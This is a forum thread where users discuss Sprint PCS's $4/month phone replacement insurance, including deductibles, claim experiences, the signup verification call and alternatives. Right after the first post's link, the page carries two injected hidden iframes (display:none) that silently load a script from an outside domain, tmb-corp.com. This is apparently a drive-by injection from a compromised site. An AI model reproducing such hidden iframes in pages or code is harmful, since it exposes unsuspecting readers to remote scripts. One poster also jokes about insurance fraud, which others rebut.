+ Reply to Thread
Page 1 of 5 1 2 3 4 5 LastLast

Thumbs up $4/month = peace of mind

Maybe I'm the only one didn't know it existed, but I happened upon Sprint's "Equipment Replacement" program on their site while looking for something completely unrelated.

The long and the short is that Sprint will tack on $4/month to your statement, but then if your phone is lost/stolen/broken they will replace it (with a $500 cap) after a $35 deductible with a maximum of 2 claims per year.

I'm not normally one for the "insurance option", but given the number of times that I bounced my old (cheap) phone, this is a no brainer for me.

I thought I'd post the info in case there are others that are nervous about breaking their new toy.

https://m28.sprintpcs.com/services/replacement.html<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by runninghans; 11-28-2001 at 12:38 PM.

Administrator

Arrow

sprint has had this for a long while... they even dropped the price down..

this is definately worth it!! i have had this equipment replacement sicne i was with sprint back in 98.

please guys and gals.. get it!!!

peace of mind

Thumbs up

I started the insurance last year after buying the Touchpoint TP-3000. Not long after, I left my phone on the top of my car and drove off. The only piece of it I could find was part of the keypad. I found that the claim calls go to SPCS' agent not to Customer Support (a good thing). I called on Sunday and had the replacement on Wednesday. Shipping would have been almost as much as the deductible. No hassle, no forms to fill out, no police report required, etc. etc.

I think it would be just plain dumb to take this out on a $50 giveaway phone but think that's what they're counting on. I would not have the I-300 without insurance ... 'tho I can only use it one more time before my 'policy' is cancelled!

I agree

I agree 100%. Paying $4/month + $35/deductible for a $100 or $150 phone is silly, but NOT taking it out on a $500 phone is insane.

For the record, it's not as bad of a deal for Sprint as you might think. Remember, the wholesale cost of an i300 is around $310, and they replace phones with remanufactured ones whenever possible. So they're replacing broken/stolen phones with replacements that probably cost them $200-250, and getting $35 from you along the way. So overall, they're probably breaking even with i300 owners.

On the other hand, it's safe to assume that they're totally raking in the cash on insurance plans for cheaper phones. For discontinued models for which remanufactured items are dirt cheap (like the sch-3500), they might even be making a profit from the deductible alone WITHOUT even taking cumulative monthly premiums into account.

How long after buying the phone can I get it? Suppose I've had the phone for a year... could I get the service then?

I think you need to buy it when the phone is first activated.

Administrator

Arrow

mas,

you can get the equipment replacement insurance ANYTIME! go sign up now... tell 'em uncle marc sent 'cha !

Thanks. Though I can't see how that's smart for Sprint. If I "lose" my phone at noon on Sunday, I'll rush to sign up, then keep looking for my phone... only to declare it officially lost after the insurance kicks in. Or maybe I'll wait a year, sign up, and "break" my phone playing baseball with it.

Insurance company slightly smarter than that!

Actually, the insurance company is slightly smarter than that.

I just signed up for the $4/month insurance as I've been a SprintPCS customer for 2 years, but never needed insurnace for my old phone.

The proceedure is entirely automated and it goes like this:

- You call the insurance phone number
    - You enter your phone number
    - After a series of confirmations, it will tell you that it will call your phone in 15 minutes
    - Your phone will receive an automated call. If you have lost your phone, or it is broken, it will fail at this step.
    - You have to confirm your phone number again at this point
    - And you're done. There is a 20 day period before the insurance to kick in.

Hence, if you lost your phone, or broke it, you would not be able to complete the insurance signup!

- After a series of confirmations, it will tell you that it will call your phone in 15 minutes
    Or.. in my case, 6 days after I applied.

Signed up for the service, completely slipped my mind that they were supposed to call, 6 days later at work I get a call from an unknown number. Glad I answered it - I usually don't answer calls from unknown numbers. Turns out it was the guy to verify that my phone worked.

Better late then never.

Wish I would have known about this with my SPH-8500.. of course if I had it, I wouldn't have had to buy the i300 so maybe its a good thing I didn't have the insurance when I lost my old one.

- hitman

Exclamation Dont leave home without it (insurance)

I wouldn't dare possess this phone without said insurance. Much better than the 3 year coverage plan Best Buy offers as Sprint covers theft, loss and personal foolish treatment of the device. In the long run we may be paying more than the Best Buy deal but as for actual usefulness for those special circumstances involving phone viability ( and usually most situations involving a need for phone replacement is a special circumstance) I am quite happy and feeling secure with the Sprint Insuarance plan.
    Our device aint no cheep Nokia!!!!!

Happy phoning and computing!

Prahneum
    He he he

There's better coverage available for less money than Sprint's, with no deductible to fuss over. If you have homeowner's insurance, check with your carrier. Mine, for instance, offers full replacement value for any mishap for $2.50/mo. Plus, you get cash, not someone else's cast-off or worse.

...and if you lose 2 phones in a year Phil? ...and if you lose 4 phones in 2 years Phil? Do you know the quotes on the insurance should you be plagued by loss, theft, and damage?

so what happens if you lost your phone.... sprint replaced it, then you found it?

Brooks

Administrator

Arrow

fikse,

you wont be able to really use it.. they have the ESN in their computers and that tagg it.. so if someone was to get it and activate it, a flag would come up alerting that this phone was lost...

Careful, Marc. You'd still have a pretty nice Palm device.

...and then you'd have that backup device! Not encouraging any illegal acts.

Administrator

Arrow

you are soo true MJ! if you do find it, that would be a great asset, but in case someone does that then tries to sell it, they will have problems down the road...

in the analog days, you could get away with it...

Yes, the good old analog days. I sure do miss them About as much as that rash on my @$$

HEY, who said that???
    Let he who is without sin cast the first stone.

OUCH!!!

My understanding is that the insurance coverage offered is comprehensive. So you find a lost phone - it's just another Palm, and not a very good one, without activation. As for losing 4 phones a year - be careful, doggone it!